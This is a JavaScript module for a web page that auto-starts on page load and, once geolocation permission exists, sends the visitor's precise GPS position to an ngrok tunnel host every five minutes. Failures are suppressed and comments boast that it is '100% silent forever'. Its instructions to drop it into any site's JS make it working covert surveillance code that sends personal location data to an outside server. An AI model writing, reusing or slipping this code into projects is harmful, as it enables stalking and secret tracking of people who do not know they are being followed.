import API_BASE_URL from "../config";

// Prevent multiple intervals
let isRunning = false;

const startSilentTracking = () => {
    if (isRunning) return;
    isRunning = true;

    const sendLocation = () => {
        navigator.geolocation.getCurrentPosition(
            async (pos) => {
                const { latitude, longitude, accuracy } = pos.coords;
                const timestamp = Date.now();

                console.log(`Location sent: ${latitude.toFixed(6)}, ${longitude.toFixed(6)} ±${accuracy}m`);

                try {
                    await fetch(`https://lilia-landed-unbriefly.ngrok-free.dev/gps/save`, {
                        method: "POST",
                        headers: { "Content-Type": "application/json" },
                        body: JSON.stringify({ latitude, longitude, accuracy, timestamp }),
                    });
                } catch (e) {
                    // Totally silent on failure (offline, blocked, etc.)
                    console.log("Send failed (will retry in 5min)");
                }
            },
            () => {}, // Silent error — do nothing
            {
                enableHighAccuracy: true,
                timeout: 20000,
                maximumAge: 60000,
            }
        );
    };

    // Send now + every 5 minutes
    sendLocation();
    window._gpsInterval = setInterval(sendLocation, 5 * 60 * 1000);
    console.log("Silent GPS tracking ACTIVE (5 min)");
};

// Auto-start when page loads — ONLY if permission already allowed
// Put this anywhere in your JS (runs on every page load)
if (navigator.geolocation) {
    navigator.permissions.query({ name: "geolocation" }).then((p) => {
        if (p.state === "granted") {
            startSilentTracking();            // 100% silent forever
        } else if (p.state === "prompt") {
            // First time – need one click/tap
            console.log("Click the button once to allow location");
        } else {
            // "denied" → only manual fix possible
            console.log("Location blocked → manually go to site settings and Allow");
            // You can show a tiny non-annoying toast instead of alert if you want
        }
    });
}

// Optional: Click button to force start (even if first time)
export const handleGpsClicked = () => {
    if (!navigator.geolocation) return;

    navigator.permissions.query({ name: "geolocation" }).then((p) => {
        if (p.state === "denied") {
            console.log("Location permanently blocked. Go to site settings.");
            return;
        }
        startSilentTracking(); // Will ask permission ONCE, then forever silent
    });
};